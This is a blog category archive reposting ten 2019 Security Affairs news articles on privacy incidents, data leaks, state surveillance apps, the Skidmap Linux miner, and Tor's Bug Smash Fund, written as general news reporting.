Category Archives: digital id

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple, most of its users likely ignore that the company is sharing iOS web browsing data on some of them to Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying, starting from at least iOS 12.2, Apple has integrated the “Tencent Safe Browsing” to improve security of its users and protect them from fraudulent websites. The Tencent Safe Browsing does it by implementing the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS that checks every site visited by the users.

Apple secure browsing

The service leverages a blacklist of malicious websites that are continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to know the websites he visits and also log their IP address to manage the browsing history. At the time, it’s not clear if Tencent is also collecting IP addresses from users residing outside of China, likely the Tencent’s blacklist is only provided to Chinese users because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that such kind of major changes has to be notified to the users.

The good news is that users could turn off the Fraudulent Website Warning feature in Safari, even if they are potentially exposed to online threats.

The feature is enabled by default on iPhones and iPads devices running iOS 13, below the instruction to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized to have used phone numbers and email addresses, privided by the users for security purposes, for advertising. According to the social media company, data used for account authentication were also matched with advertisers’ database to improve the efficiency of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing it is unclear the number of impacted Twitter users.

The company attempted to downplay the severity of the privacy incident highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads to customers based on the advertiser’s own marketing lists that includes info such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads to audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded their marketing list, its staff may have matched the information included in these lists with data provided by its users to protect their accounts.

The root cause of the problem was addressed in September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,”

Pierluigi Paganini

(SecurityAffairs – Twitter, privacy)

The post Twitter inadvertently used Phone Numbers collected for security for Ads appeared first on Security Affairs.

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt ‘ government has been spying citizens in a sophisticated surveillance program

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The expert started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims that were tricked into download the malicious apps that offered useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over the time. Attackers used a range of domain names that included words like “secure” and “verify” in their names to avoid raising suspicion of the victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the expert to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

Heyyo dating app left its users’ data exposed online

Another day, another embarrassing data leak made the headlines, the online dating app Heyyo left a server exposed on the internet.

The online dating app Heyyo left a server exposed on the internet without protection, data were stored on an Elasticsearch instance.

The exposed data included personal details, images, location data, phone numbers, and dating preferences for nearly 72,000 users.

The detailed data exposed left online included:

  • Names
  • Phone numbers
  • Email addresses
  • Dates of birth
  • Gender
  • Height
  • Profile pictures and other images
  • Facebook IDs for users who linked their profiles
  • Instagram IDs for users who linked their profiles
  • Longitude and latitude
  • Who liked a user’s profile
  • Liked profiles
  • Disliked profiles
  • Superliked profiles
  • Blocked profiles
  • Dating preferences
  • Registration and last active date
  • Smartphone details

The news was first reported by ZDNet who was informed about the incident by security researchers from WizCase.

“Avishai Efrat, Wizcase leading hacktivist, discovered a severe data leak on Heyyo, a relatively new mobile dating app. Our team was able to access a database of over 70,000 users from around the world through an unsecured Elasticsearch engine.reported WizCase. “The majority of affected users are based in Turkey, but there’s also a significant number from the US and Brazil, which is over ⅕ of their user base. “

ZDNet verified the authenticity of the data and contacted the Turkey-based company behind Heyyo to notify it of the leak, but the company did not reply for a week.

While waiting for a reply from the development team, the experts noticed that the number of registered users grew from 71,769 to 71,921. Experts also registered an account ad verified that associated data were leaked online. This circumstance suggests that the server was a live production system.

The server was taken down today after ZDNet contacted Turkey’s Computer Emergency Response Team (CERT).

Clearly, the exposure of this type of data poses serious risks, including the extortion, to the users’ privacy.

At the time of writing is unclear if anyone else had access to the exposed database.

Unfortunately, other dating platforms suffered similar incident in the past, including Ashley MadisonGrindr, 3Fun, and Luscious.

WizCase also has its own report on the leak, for additional reading.

Pierluigi Paganini

(SecurityAffairs – Heyyo, hacking)

The post Heyyo dating app left its users’ data exposed online appeared first on Security Affairs.

Facebook suspends tens of thousands of apps from hundreds of developers

Facebook announced it has suspended tens of thousands of apps as a result of a review of privacy practices launched following the Cambridge Analytica scandal.

In April 2018, Facebook revealed that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought. The company allowed to access to the personal data of around 87 million Facebook users without their explicit consent.

After the Cambridge Analytica privacy scandal in 2018, the social network giant launched a review of privacy practices. Facebook’s review of all apps on the platform aimed at determining alleged abuse of user data and violation of its privacy rules.

Now Facebook announced that the suspensions of tens of thousands of apps.

According to vice president of partnerships Ime Archibong, the suspensions are “not necessarily an indication that these apps were posing a threat to people.” Archibong also added that some “did not respond to our request for information.”

Archibong revealed that the review “has addressed millions of apps. Of those, tens of thousands have been suspended for a variety of reasons while we continue to investigate.” In some case Facebook completely banned the apps.

In July, the United States Federal Trade Commission (FTC) has approved a record $5 billion settlement with Facebook over the Cambridge Analytica scandal.

Archibong explained that development teams behind the apps have to annually certify compliance with Facebook policies.

“Any developer that doesn’t go along with these requirements will be held accountable.” concluded Archibong.

Pierluigi Paganini

(SecurityAffairs – social network, privacy)

The post Facebook suspends tens of thousands of apps from hundreds of developers appeared first on Security Affairs.

More than 737 million medical radiological images found on open PACS servers

Researchers at Greenbone Networks vulnerability analysis and management company discovered 400 Million medical radiological images exposed online via unsecured PACS servers.

The experts at Greenbone Networks vulnerability analysis and management company discovered 600 unprotected servers exposed online that contained medical radiological images. The research was conducted between mid-July 2019 and early September 2019.

The unprotected medical image storage systems were located in 52 countries, the experts discovered that they were affected by 10,000 vulnerabilities, more than 500 of them rated with the highest severity score (CVSS 10 out of 10).

Greenbone Networks researchers analyzed about 2,300 Picture Archiving and Communication System (PACS) systems exposed online.

PACS servers are used in the healthcare industry to archive images created by radiological processes and to make them available to medical staff for analysis and diagnosis. These systems use the DICOM (Digital Imaging and Communications in Medicine) standard to manage medical imaging data.

The experts discovered 590 PACS servers that allowed them to retrieve about 24.3 million patient records.

“Of the 2,300 archive systems worldwide that were analyzed, 590 of them have been identified as accessible on the internet; together they contain over 24 million data records from patients from across 52 countries.” reads the report published Greenbone. “There are more than 737 million images linked to this patient data, around 400 million of which are accessible or can be easily downloaded from the internet. In addition, there are 39 systems that allow access to patient data via an unencrypted HTTP Web Viewer, without any protection.”

Most of the exposed records included the following personal and medical details:

  • First name and surname
  • Date of birth
  • Date of examination
  • Scope of the investigation
  • Type of imaging procedure
  • Attending physician
  • Institute/clinic
  • Number of generated images

The researchers used a RadiAnt DICOM Viewer to analyze data from open PACS servers exposed online, they were able to download and view 399.5 million images out of 733.5.

Giving a look at the geographic distribution of the PACS servers that were leaking the images, most of unprotected PACS servers is in North America is in the U.S.

“In the US, the number is orders of magnitude higher with 13.7 million data sets and 45.8 million images freely accessible on the internet.” continues the report.

Experts discovered that Italy has the highest number of affected systems (10) in Europe and it is also the country with the largest number of leaked medical information.

PACS servers

In South America, most of the exposed images were stored on PACS servers in Brazil (34), in the country the experts found 640,000 data sets, and 31.1 million images.

Most of the open servers in Asia are in India (100), while most of the number of data records (4.9 million) is in Turkey.

Apart from these problems, the audit discovered that 45 PACS provided data over an insecure protocol such as HTTP or FTP, instead of DICOM. Thus, data stored on them could be accessed without authentication.

One of these had the files of the DICOM archive available in a directory listing, allowing access to anyone via a web browser.

Researchers estimated that the value of leaked data on the Darknet would probably be in excess of one billion US dollars.

“This data could be exploited by attackers for various purposes. These include publishing individual names and images to the detriment of a person’s reputation; connecting the data with other Darknet sources to make phishing social engineering even more effective; reading and automatically processing the data to search for valuable identity information, such as Social Security Numbers, in preparation for identity theft.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – PACS servers, data leak)

The post More than 737 million medical radiological images found on open PACS servers appeared first on Security Affairs.

Skidmap Linux miner leverages kernel-mode rootkits to evade detection

Trend Micro researchers spotted a piece of Linux cryptocurrency miner, dubbed Skidmap that leverages kernel-mode rootkits to evade the detection.

Skidmap is a new piece of crypto-miner detected by Trend Micro that target Linux machines, it uses kernel-mode rootkits to evade the detection.

This malware outstands similar miners because of the way it loads malicious kernel modules to evade the detection.

The crypto-miner set up a secret master password that uses to access any user account on the system.

“These kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system.” states the analysis published by TrendMicro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”

Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same that provided the attackers with root or administrative access to the system.

The infection chain sees the Skidmap miner installing itself via crontab, then the malicious code downloads and executes the main binary. The malware decreases the security settings of the target systems by configuring the Security-Enhanced Linux (SELinux) module to the permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also set up backdoor access to the infected system.

Skidmap also provides attackers with backdoor access to the infected machine.

Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine. The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version”

The main binary checks whether the system runs on Debian or RHEL/CentOS, then drops the miner and other for the specific Linux distro.

Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Samples of these components are:

A fake “” binary that replaces the original, once executed it will randomly set up a malicious cron job to download and execute a file.

Another component is “kaudited,” s file installed as /usr/bin/kaudited that drops and installs several loadable kernel modules (LKMs). The kaudited binary also drops a watchdog component used to monitor the mining process.

Trend Micro also described the “iproute” module that hooks the system call getdents that is normally used to read the contents of a directory, with the intent of hiding specific files.

The last component is “netlink,” a rootkit that can fake the network traffic statistics and CPU-related statistics to hide the activity of the malware.

Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware.” Trend Micro concludes. “In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up,”

Pierluigi Paganini

(SecurityAffairs – Skidmap miner, Linux)

The post Skidmap Linux miner leverages kernel-mode rootkits to evade detection appeared first on Security Affairs.

Experts warn of the exposure of thousands of Google Calendars online

The news is shocking, thousands of Google Calendars are leaking private information posing a severe threat to the privacy of the users.

Thousands of Google Calendars are leaking private information online threatening the privacy of the users.

Google Calendar has more than q billion users that can potentially expose their private affairs due to the implementation of an issue in the “invite” feature. It is essential to point out that this isn’t a security vulnerability in Google Calendar, but an issue that could potentially impact anyone that has ever shared his Google Calendars.

you should immediately go back to your Google settings and check if you’re exposing all your events and business activities on the Internet accessible to anyone.

The security researcher Avinash Jain discovered more than 8000 Google Calendars exposed online that were indexed by Google search engine. This means that anyone could potentially access sensitive deta and add new events that could be used to share bogus information or malicious links.

Avinash Jain contacted several media outlets, including Forbes and THN, the Indian expert works for the e-commerce firm Grofers.

“What I found is that — Using a single Google dork (advance search query), I am able to list down all the public google calendar or users who all have set their calendar as public. I found dozens of calendars which are indexed by google’s search engines, revealing or disclosing several sensitive information.” wrote the expert. “I was able to access public calendars of various organizations leaking out sensitive details like their email ids, their event name, event details, location, meeting links, zoom meeting links, google hangout links, internal presentation links and much more,”

Google Calendars

Some of the calendars belonged to employees of the top 500 Alexa company that intentionally/unintentionally were made public.

The issue is related to the public visibility set on the google calendar by the users. Google fails to send any notification to the users warning them about the visibility of their calendar.

“While this is more of an intended setting by the users and intended behavior of the service but the main issue here is that anyone can view anyone public calendar, add anything on it—just by a single search query without being shared the calendar link,” Avinash added.

The issue is not new, many experts in the last years warned of the misuse of the “make it public” feature to its web-based calendar service that was implemented 12 years ago.

The expert demonstrated that it is possible to view the exposed Google Calendars by using advanced Google search query (Google Dork).

“The fix for this: https://support.google.com/a/answer/60765?hl=en. You can set the calendars to only say Free/Busy if anyone wants to make their calendar public. GSuite admin can also create alerts for when Google docs, presentations, and calendars go public.” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – Google Calendars, privacy)

The post Experts warn of the exposure of thousands of Google Calendars online appeared first on Security Affairs.

France and Germany will block Facebook’s Libra cryptocurrency

Bad news for Facebook and its projects, France and Germany agreed to block Facebook’s Libra cryptocurrency, the French finance ministry said.

France and Germany governments announced that they will block Facebook’s Libra cryptocurrency, the news was reported by French finance ministry Bruno Le Maire.

“We believe that no private entity can claim monetary power, which is inherent to the sovereignty of nations”. reads a joint statement issued by the two governments,

“I want to be absolutely clear: in these conditions, we cannot authorise the development of Libra on European soil.” he said at a conference in Paris on virtual currencies.

French Finance Minister Bruno Le Maire explained last week the Facebook should not be allowed to operate the Libra cryptocurrency in Europe because it threatens the monetary sovereignty and financial systems of the states.

Facebook Libra cryptocurrency
Source: Coindesk.com

Facebook announced in June that it plans to launch Libra in 2020, to make it reliable the social network giant wants to use traditional currency to back Libra. 

The non-profit Libra Association include major firms such as PayPal, Visa, Stripe, Mastercard, eBay, and Uber. 

“Unlike other cryptocurrencies, which are not controlled by a central authority, Libra will not be decentralised, but will be entrusted to a Swiss-based association of major technology and financial services companies. Besides Facebook, backers of Libra include the payment companies Visa, MasterCard and PayPal, and the ride-hailing apps Lyft and Uber.” reported The Guardian.

Authorities also fear possible abuses of the Libra cryptocurrency, including money laundering, and how Facebook would prevent them.

Pierluigi Paganini

(SecurityAffairs – Facebook, cryptocurrency)

The post France and Germany will block Facebook’s Libra cryptocurrency appeared first on Security Affairs.

Tor Project’s Bug Smash Fund raises $86K in August

The Tor Project has raised $86,000 for a Bug Smash fund that it will use to pay developers that will address critical flaws in the popular anonymizing network.

The Tor Project has raised $86,000 for a Bug Smash fund that was created to pay developers that will address critical security and privacy issues in the popular anonymizing network.

In earlier of August, the Tor Project announced the creation of the Bug Smash Fund with the intent to pay professionals that will support the organization in maintaining the work and smashing the bugs.

“The goal of the Bug Smash Fund is to increase the Tor Project’s reserve of funds that allow us to complete maintenance work and smash the bugs necessary to keep Tor Browser, the Tor network, and the many tools that rely on Tor strong, safe, and running smoothly.” reads the announcement published by the Tor Project.

“When we say maintenance and bugs, we are talking about work that is critical—and that we must pay for. This work includes responding quickly to security bugs, improving test coverage, and keeping up with Mozilla’s ESRs. An entire ecosystem relies on us doing so.”

The organization has added donations it received in August 2019 to the Bug Smash Fund.

Any vulnerability that could be used to de-anonymize Tor users or that could be used by attackers to cause a malfunction to the anonymizing network is considered critical and must be addressed rapidly, and part of the Bug Smash Fund will allow paying developers to do it.

The funding project aims to be transparent, any donors can track how that money is being used by the foundation, the Tor Project will tag any bug tickets that utilize the money of the fund with the “BugSmashFund” tag.

“Want to keep up with the work we’re doing with this fund? There are three ways: (1) Follow the “BugSmashFund” trac ticket tag, (2) watch this blog for updates about the progress of these tickets, and (3) make a donation and opt in for our newsletter to get updates directly to your inbox.” concludes the announcement.

“Want to contribute anonymously, with cryptocurrency, or by mail? Here’s how.”

Pierluigi Paganini

(SecurityAffairs – Tor Project, privacy)

The post Tor Project’s Bug Smash Fund raises $86K in August appeared first on Security Affairs.